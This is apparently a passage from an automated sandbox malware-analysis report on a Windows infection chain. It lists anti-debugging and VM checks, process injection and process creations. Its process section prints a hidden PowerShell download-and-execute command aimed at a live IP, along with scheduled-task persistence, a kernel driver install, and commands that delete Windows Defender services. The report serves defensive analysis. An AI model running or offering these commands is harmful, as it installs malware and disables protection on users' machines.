Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor}
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V aivsyofviydytbq Bus Pipes
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=0b784c52-0db5-4ac0-abda-f47798123e96
Source: powershell.exe, 00000005.00000002.910550227.0000000007312000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1743321721.000001F7D1BC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000005.00000002.910102296.0000000007262000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: apple.exe, 0000001C.00000002.1563949033.00000000065F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual ProcessorskG$
Source: chrome.exe, 0000002D.00000002.1743321721.000001F7D1C00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisoriU
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processor.muigG(
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000002.956968320.0000000000C98000.00000040.00000001.01000000.0000000B.sdmp, Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996513045.0000000000C98000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000C.00000002.991548172.0000000000CF8000.00000040.00000001.01000000.0000000F.sdmp, 466a80d633.exe, 00000032.00000002.1925697033.0000000000B18000.00000040.00000001.01000000.0000001C.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Code function: 10_2_054C094D rdtsc 10_2_054C094D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00448E10 LdrInitializeThunk, 24_2_00448E10
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5EAA2 BlockInput, 0_2_00E5EAA2
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E12622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E12622
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DE42DE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E04CE8 mov eax, dword ptr fs:[00000030h] 0_2_00E04CE8
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E40B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00E40B62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E12622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E12622
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E0083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E0083F
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E009D5 SetUnhandledExceptionFilter, 0_2_00E009D5
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E00C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00E00C21
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F41A20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00007FF748F41A20
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F383F8 SetUnhandledExceptionFilter, 22_2_00007FF748F383F8
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F38408 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00007FF748F38408
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F38088 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_00007FF748F38088
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738791A20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_00007FF738791A20
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387883F8 SetUnhandledExceptionFilter, 25_2_00007FF7387883F8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738788408 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_00007FF738788408
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738788088 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_00007FF738788088

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi32_5340.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_656.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: mshta.exe PID: 5740, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mshta.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 656, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Section unmapped: unknown base address: 400000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44D000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FF6008
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 425000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 427000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 72D008
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41C000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 429000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42C000
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E41201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00E41201
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E22BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00E22BA5
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4B226 SendInput,keybd_event, 0_2_00E4B226
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00E622DA
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE"
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe "C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe "C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe "C:\Users\user\AppData\Local\Temp\10351780101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe "C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe "C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4F33.tmp\4F34.tmp\4F35.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\504C.tmp\504D.tmp\504E.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E40B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00E40B62
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E41663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00E41663
